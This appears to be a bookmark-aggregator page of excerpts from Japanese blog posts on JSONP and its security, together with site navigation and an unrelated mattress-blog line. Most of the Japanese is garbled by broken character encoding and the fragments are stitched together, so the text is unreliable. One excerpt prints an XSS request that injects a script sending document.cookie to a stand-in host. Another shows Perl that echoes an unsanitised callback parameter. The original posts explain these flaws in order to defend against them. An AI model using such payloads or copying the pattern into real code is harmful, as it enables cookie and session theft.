ウレタン系高å発マットレスã§ã‚ˆã言åŠã•ã‚Œã‚‹ã®ãŒå¯†åº¦ã§ã™ã€‚ãã‚Œã‚’é ‘å¼µã£ã¦åˆ†ã‹ã‚Šã‚„ã™ã説明ã—ã¦ã¿ã¾ã™ã€‚
高å発マットレスã®é¸ã³æ–¹ | アフィブãƒã‚°ã«é¨™ã•ã‚Œãªã„為ã®é«˜å発マットレス手記
ウレタン系高å発マットレスã§ã‚ˆã言åŠã•ã‚Œã‚‹ã®ãŒå¯†åº¦ã§ã™ã€‚ãã‚Œã‚’é ‘å¼µã£ã¦åˆ†ã‹ã‚Šã‚„ã™ã説明ã—ã¦ã¿ã¾ã™ã€‚
404 Blog Not Found:javascript perl - yubin2jsonp
2006å¹´09月24æ—¥16:00 カテゴリLightweight Languages javascript + perl - yubin2jsonp ã©ã†ã›ãªã‚‰ã€JSONPを使ã£ã¦ã©ã“ã«ã§ã‚‚è¨ç½®ã§ããŸã‚‰ã„ã„ã˜ã‚ƒã‚“ã¨æ€ã£ãŸã®ã§ã“ã‚“ãªã®ã“ã•ãˆã¾ã—ãŸã€‚ [Ajax] CGIä¸è¦ã®éƒµä¾¿ç•ªå·â†’ä½æ‰€å¤‰æ›ãƒ•ã‚©ãƒ¼ãƒ  Kawa.net Blog /ウェブリブãƒã‚° JavaScript ã®ã¿ã§ç¨¼å‹•ã™ã‚‹ãŸã‚ã€ã‚µãƒ¼ãƒã‚µã‚¤ãƒ‰ã§ç¨¼å‹•ã™ã‚‹CGIプãƒã‚°ãƒ©ãƒ ã¯ä¸è¦ã§ã™ã€‚ã“ã‚“ãªæ„Ÿã˜ã§ã™ã€‚ 〒(7ã‘ãŸ) 都é“府県 å¸‚åŒºç”ºæ‘ ç”ºåŸŸä»¥é™ HTMLã¾ã§å«ã‚ãŸsourceã¯ã“ã‚“ãªæ„Ÿã˜ã§ã™ã€‚ <script> function Yubin2JSONP(root){ this.root = root; this.parse = function(yubin){ if (! yubin.match(/[0-9]{7}/) ) return
Kazuho@Cybozu Labs: JSONP - データæ供者å´ã®ã‚»ã‚ュリティã«ã¤ã„ã¦
« E4X-XSS 脆弱性ã«ã¤ã„㦠| メイン | 「スーパー技術者争奪戦〠» 2007å¹´01月12æ—¥ JSONP - データæ供者å´ã®ã‚»ã‚ュリティã«ã¤ã„㦠JSONP ã®ã‚»ã‚ュリティã¯ã€ã¨ã‚‚ã™ã‚Œã°ã‚¤ãƒ³ã‚¯ãƒ«ãƒ¼ãƒ‰ã™ã‚‹å´ã«ã¤ã„ã¦ã®è°è«–ã«ãªã‚ŠãŒã¡ã§ã‚ã‚Šã€ãã®å½±ã§ã‚¤ãƒ³ã‚¯ãƒ«ãƒ¼ãƒ‰ã•ã‚Œã‚‹å´ã®ãƒªã‚¹ã‚¯ãŒè¦‹éŽã”ã•ã‚ŒãŒã¡ã§ã™ã€‚JSONP ã®ä½¿ç”¨ã«ã‚ãŸã£ã¦ã¯ã€ãƒ‡ãƒ¼ã‚¿æ供者ã¸ã® XSS ã«æ³¨æ„ã™ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚脆弱ãªä¾‹ã¨ã—ã¦ã¯ã€ä»¥ä¸‹ã®ã‚ˆã†ãªã‚‚ã®ãŒã‚ã‚Šã¾ã™ã€‚ GET /json.cgi/append.html?padding=%3Cscript%3Elocation='http://example.jp/'%2Bdocument.cookie%3C/script%3E HTTP/1.0 Host: example.com HTTP/1.0 200 OK Content-Type: text/javascript;
æ©Ÿå¯†æƒ…å ±ã«JSONPã§ã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹ãª
2007å¹´6月7æ—¥ ã¯ã¦ãªãƒ–ックマークã®ã‚³ãƒ¡ãƒ³ãƒˆã‚’ã†ã‘ã¦ã€ã€Œå¸¸ã«JSONPã€JSONã€JavaScriptã«æ©Ÿå¯†äº‹é …ã‚’å«ã‚ãªã„よã†ã«ã€ã¨ã„ã†ä¸»å¼µã‚’改ã‚ã€ã€Œã‚¯ãƒã‚¹ãƒ‰ãƒ¡ã‚¤ãƒ³ã‚¢ã‚¯ã‚»ã‚¹ã®å¯¾ç–ã‚’ã¨ã£ã¦ã„ãªã„状態ã§ã¯JSONPã€JSONã€JavaScriptã«æ©Ÿå¯†äº‹é …ã‚’å«ã‚ãªã„よã†ã«ã€ã¨ã„ã†ä¸»å¼µã«é–¢ã—ã¦è¨˜è¿°ã—ã¾ã—ãŸã€‚ ã“ã‚“ã«ã¡ã¯ã€SEã®é€²åœ°ã§ã™ã€‚ 今回ã‹ã‚‰é€±å˜ä½ã§Webアプリケーションã®ã‚»ã‚ュリティã«é–¢ã™ã‚‹ã‚¨ãƒ³ãƒˆãƒªãƒ¼ã‚’書ã„ã¦ã„ã“ã†ã¨æ€ã„ã¾ã™ã€‚ 僕自身ã€æ—¥ã€…勉強ã—ã¦ç²¾é€²ã¨ã„ã†ã¨ã“ã‚ã§ã™ã®ã§ã€ã‚‚ã—何らã‹ã®èª¤ã‚ŠãŒã‚ã‚Œã°æ˜¯éžã”指摘ãã ã•ã„。 ã¤ã£ã“ã¿å¤§æ“è¿Žã§ã™ã€‚ 今回å–り上ã’ã‚‹ã®ã¯Web 2.0ãªã‚¢ãƒ—リケーションã§ã‚»ã‚ュリティé¢ã§æ°—ã‚’ã¤ã‘ã‚‹ã¹ãã“ã¨ã®ä¸€ã¤ã€æ©Ÿå¯†æƒ…å ±ã«JSONPã§ã‚¢ã‚¯ã‚»ã‚¹ã™ã‚‹ãªã§ã™ã€‚ JSON(JavaScript Object Notation)ã¯JavaScript(ECMAScript)ã®
JSONPを用ã„ã¦ã‚¯ãƒã‚¹ãƒ‰ãƒ¡ã‚¤ãƒ³ã§æƒ…å ±ã‚’å–å¾—ã™ã‚‹ - ã‚ãã‚‹æ—¥
http://hail2u.net/blog/coding/jsonscriptrequest.html http://hail2u.net/blog/coding/jsonp.html ã“ã®è¾ºã‚’èªã‚“ã§ã€è³¢ã„ãªãã¨é–¢å¿ƒã—ãŸã€‚ã›ã£ã‹ããªã®ã§ã€æ—©é€Ÿã‚„ã£ã¦ã¿ãŸã€‚ ãƒã‚¿ã¯ãŸã¾ãŸã¾ä½œã£ã¦ã‚ã£ãŸGoogle多数決ã§ã€ã‚ã‚Œã¯jsonã®ã‚¤ãƒ³ã‚¿ãƒ¼ãƒ•ã‚§ã‚¤ã‚¹ãŒã‚ã‚‹ã®ã§ã€ã“れをã¡ã‚‡ã£ã¨ã ã‘æ‹¡å¼µã™ã‚‹ã€‚最åˆã«ã§ã上ãŒã£ãŸã‚‚ã®ã‹ã‚‰â†’Not found ã¾ãšã¯ãƒãƒƒã‚¯ã‚¨ãƒ³ãƒ‰ã€‚ return '('.JSON::Syck::Dump($struct).')'; ã“ã†ã„ã†ã®ã‚’以下ã®ã‚ˆã†ã«ã€‚ my $result = '('.JSON::Syck::Dump($struct).')'; $result = $self->query->param('jsonp') . $result if $self->query->param(
1
ランã‚ング
ランã‚ング
ãŠçŸ¥ã‚‰ã›
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
http://www.ark-web.jp/sandbox/wiki/147.html
{{#tags}}- {{label}}
{{/tags}}